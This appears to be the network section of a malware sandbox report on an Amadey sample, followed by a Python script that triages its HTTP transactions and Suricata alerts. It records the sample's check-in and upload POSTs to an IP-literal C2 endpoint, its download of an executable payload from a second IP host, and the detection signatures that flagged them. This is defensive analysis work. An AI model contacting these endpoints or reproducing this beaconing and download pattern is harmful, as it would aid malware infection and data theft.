Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. | | |
UDP Requests
- 192.168.56.101:62324 -> 164.124.101.2:53 (DNS)
- 192.168.56.101:137 -> 192.168.56.255:137 (NetBIOS name service, broadcast)
- 192.168.56.101:138 -> 192.168.56.255:138 (NetBIOS datagram, broadcast)
- 192.168.56.101:49152 -> 239.255.255.250:3702 (WS-Discovery, multicast)
- 192.168.56.101:62327 -> 239.255.255.250:1900 (SSDP, multicast)
- 192.168.56.101:62329 -> 239.255.255.250:3702 (WS-Discovery, multicast)
- 192.168.56.101:62331 -> 239.255.255.250:3702 (WS-Discovery, multicast)
- 192.168.56.101:62333 -> 239.255.255.250:3702 (WS-Discovery, multicast)
- 52.231.114.183:123 -> 192.168.56.101:123 (NTP)

The protocol labels are by well-known port. Apart from the single DNS query, these are the host-discovery and time-sync flows a Windows guest emits on its own (NetBIOS, WS-Discovery, SSDP, NTP) and are not by themselves attributable to the sample; the HTTP traffic below goes to IP-literal hosts, which is consistent with the empty DNS table.
HTTP Requests

POST 200 http://185.215.113.20/gb9fskvS/index.php
Request:
POST /gb9fskvS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.20
Content-Length: 85
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 04 Sep 2021 23:54:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 64
Content-Type: text/html; charset=UTF-8

POST 200 http://185.215.113.20/gb9fskvS/index.php?scr=1
Request:
POST /gb9fskvS/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----860f5834f8e7f8e2834fc2957042760e
Host: 185.215.113.20
Content-Length: 23742
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 04 Sep 2021 23:54:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8

GET 200 http://138.197.134.11/santa.clo
Request:
GET /santa.clo HTTP/1.1
Host: 138.197.134.11
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 04 Sep 2021 23:54:33 GMT
Content-Length: 340480
Connection: keep-alive
Keep-Alive: timeout=60
Last-Modified: Fri, 03 Sep 2021 21:23:07 GMT
ETag: "53200-5cb1de7ccc4c0"
Accept-Ranges: bytes

POST 200 http://185.215.113.20/gb9fskvS/index.php
Request:
POST /gb9fskvS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.20
Content-Length: 31
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 04 Sep 2021 23:54:50 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8

POST 200 http://185.215.113.20/gb9fskvS/index.php?scr=1
Request:
POST /gb9fskvS/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----2965658b89b496b7c43d6a6ea3ac930b
Host: 185.215.113.20
Content-Length: 23739
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 04 Sep 2021 23:55:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8

POST 200 http://185.215.113.20/gb9fskvS/index.php
Request:
POST /gb9fskvS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.20
Content-Length: 85
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 04 Sep 2021 23:55:50 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 185.215.113.20:80 -> 192.168.56.101:49212 | 2400024 | ET DROP Spamhaus DROP Listed Traffic Inbound group 25 | Misc Attack |
TCP 138.197.134.11:80 -> 192.168.56.101:49205 | 2014819 | ET INFO Packed Executable Download | Misc activity |
TCP 138.197.134.11:80 -> 192.168.56.101:49205 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 138.197.134.11:80 -> 192.168.56.101:49205 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
TCP 138.197.134.11:80 -> 192.168.56.101:49205 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic |
TCP 192.168.56.101:49200 -> 185.215.113.20:80 | 2027700 | ET MALWARE Amadey CnC Check-In | Malware Command and Control Activity Detected |
TCP 192.168.56.101:49214 -> 185.215.113.20:80 | 2027700 | ET MALWARE Amadey CnC Check-In | Malware Command and Control Activity Detected |
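A small triage script over the HTTP transactions and Suricata alerts listed above, added here as an example and not part of the sandbox output or the report: it tags each transaction with the properties the ET signatures key on (an IP-literal Host, a GET sent with no User-Agent or Accept header that returns a large body, repeated no-cache form POSTs to one endpoint, multipart uploads), measures the POST cadence from the response Date headers, and joins the result with the Suricata SIDs per remote host. The transaction and alert records are transcribed from the report; the tag names, the header heuristics and the `ioc_summary` / `beacon_intervals` function names are this example's own.

```python
"""Triage of the HTTP transactions and Suricata alerts listed in the report.

The records below are transcribed from the report (only the headers it shows);
the triage rules and names are this example's own, not the sandbox's.
"""
import re
from collections import defaultdict
from email.utils import parsedate_to_datetime
from urllib.parse import urlsplit

# Transcribed from the report: (method, url, request headers, response headers).
TRANSACTIONS = [
    ("POST", "http://185.215.113.20/gb9fskvS/index.php",
     {"Content-Type": "application/x-www-form-urlencoded", "Host": "185.215.113.20",
      "Content-Length": "85", "Cache-Control": "no-cache"},
     {"Date": "Sat, 04 Sep 2021 23:54:33 GMT", "Server": "Apache/2.4.41 (Ubuntu)",
      "Content-Length": "64", "Content-Type": "text/html; charset=UTF-8"}),
    ("POST", "http://185.215.113.20/gb9fskvS/index.php?scr=1",
     {"Content-Type": "multipart/form-data; boundary=----860f5834f8e7f8e2834fc2957042760e",
      "Host": "185.215.113.20", "Content-Length": "23742", "Cache-Control": "no-cache"},
     {"Date": "Sat, 04 Sep 2021 23:54:33 GMT", "Server": "Apache/2.4.41 (Ubuntu)",
      "Content-Length": "0", "Content-Type": "text/html; charset=UTF-8"}),
    ("GET", "http://138.197.134.11/santa.clo",
     {"Host": "138.197.134.11"},
     {"Server": "nginx", "Date": "Sat, 04 Sep 2021 23:54:33 GMT", "Content-Length": "340480",
      "Connection": "keep-alive", "Keep-Alive": "timeout=60",
      "Last-Modified": "Fri, 03 Sep 2021 21:23:07 GMT", "ETag": '"53200-5cb1de7ccc4c0"',
      "Accept-Ranges": "bytes"}),
    ("POST", "http://185.215.113.20/gb9fskvS/index.php",
     {"Content-Type": "application/x-www-form-urlencoded", "Host": "185.215.113.20",
      "Content-Length": "31", "Cache-Control": "no-cache"},
     {"Date": "Sat, 04 Sep 2021 23:54:50 GMT", "Server": "Apache/2.4.41 (Ubuntu)",
      "Content-Length": "0", "Content-Type": "text/html; charset=UTF-8"}),
    ("POST", "http://185.215.113.20/gb9fskvS/index.php?scr=1",
     {"Content-Type": "multipart/form-data; boundary=----2965658b89b496b7c43d6a6ea3ac930b",
      "Host": "185.215.113.20", "Content-Length": "23739", "Cache-Control": "no-cache"},
     {"Date": "Sat, 04 Sep 2021 23:55:34 GMT", "Server": "Apache/2.4.41 (Ubuntu)",
      "Content-Length": "0", "Content-Type": "text/html; charset=UTF-8"}),
    ("POST", "http://185.215.113.20/gb9fskvS/index.php",
     {"Content-Type": "application/x-www-form-urlencoded", "Host": "185.215.113.20",
      "Content-Length": "85", "Cache-Control": "no-cache"},
     {"Date": "Sat, 04 Sep 2021 23:55:50 GMT", "Server": "Apache/2.4.41 (Ubuntu)",
      "Content-Length": "6", "Content-Type": "text/html; charset=UTF-8"}),
]

# Transcribed from the Suricata Alerts table: (remote IP, SID, signature).
ALERTS = [
    ("185.215.113.20", 2400024, "ET DROP Spamhaus DROP Listed Traffic Inbound group 25"),
    ("138.197.134.11", 2014819, "ET INFO Packed Executable Download"),
    ("138.197.134.11", 2018959, "ET POLICY PE EXE or DLL Windows file download HTTP"),
    ("138.197.134.11", 2016538, "ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download"),
    ("138.197.134.11", 2021076, "ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response"),
    ("185.215.113.20", 2027700, "ET MALWARE Amadey CnC Check-In"),
    ("185.215.113.20", 2027700, "ET MALWARE Amadey CnC Check-In"),
]

DOTTED_QUAD = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
# Headers a browser or ordinary HTTP library always sends; their absence is the
# "minimal headers" property the ET 2016538 signature keys on.
EXPECTED_CLIENT_HEADERS = {"User-Agent", "Accept"}


def tag_transaction(method, url, req, resp):
    """Return the set of triage tags (this example's own) that apply to one transaction."""
    tags = set()
    host = req.get("Host", urlsplit(url).hostname or "")
    if DOTTED_QUAD.match(host):
        tags.add("ip-literal-host")
    ctype = req.get("Content-Type", "").lower()
    body_len = int(resp.get("Content-Length", "0"))
    if method == "GET" and not (EXPECTED_CLIENT_HEADERS & set(req)) and body_len > 0:
        tags.add("minimal-headers-download")   # bare GET that still pulled a payload
    if method == "POST" and req.get("Cache-Control", "").lower() == "no-cache" \
            and ctype.startswith("application/x-www-form-urlencoded"):
        tags.add("no-cache-form-post")          # check-in style POST
    if method == "POST" and ctype.startswith("multipart/form-data"):
        tags.add("multipart-upload")            # data sent up to the server
    return tags


def beacon_intervals(transactions):
    """Seconds between successive POSTs to the same (host, path, query), taken from
    the response Date header. A steady cadence to one endpoint suggests beaconing."""
    times = defaultdict(list)
    for method, url, req, resp in transactions:
        if method != "POST":
            continue
        p = urlsplit(url)
        times[(p.hostname, p.path, p.query)].append(parsedate_to_datetime(resp["Date"]))
    return {key: [int((b - a).total_seconds()) for a, b in zip(ts, ts[1:])]
            for key, ts in ((k, sorted(v)) for k, v in times.items())}


def ioc_summary(transactions, alerts):
    """Per remote host: the URLs hit, the union of triage tags, and the Suricata SIDs raised."""
    out = defaultdict(lambda: {"urls": set(), "tags": set(), "sids": set()})
    for method, url, req, resp in transactions:
        host = urlsplit(url).hostname
        out[host]["urls"].add(url)
        out[host]["tags"] |= tag_transaction(method, url, req, resp)
    for ip, sid, _sig in alerts:
        out[ip]["sids"].add(sid)
    return dict(out)


if __name__ == "__main__":
    for host, info in ioc_summary(TRANSACTIONS, ALERTS).items():
        print(host, sorted(info["tags"]), sorted(info["sids"]))
        for u in sorted(info["urls"]):
            print("   ", u)
    for key, gaps in beacon_intervals(TRANSACTIONS).items():
        print("beacon", key, gaps)
```

Run stand-alone it reduces the report to two hosts: 138.197.134.11 carries the bare-header executable retrieval (340480-byte body fetched with only a Host header) and the four ET INFO/POLICY/HUNTING SIDs, and 185.215.113.20 carries the form-POST endpoint the two Amadey CnC Check-In hits landed on, with the plain check-ins 17 s and 60 s apart and two multipart uploads of about 23.7 KB to the `?scr=1` variant in between. The request bodies are not in the report, so the script deliberately does not try to decode the check-in format.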
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts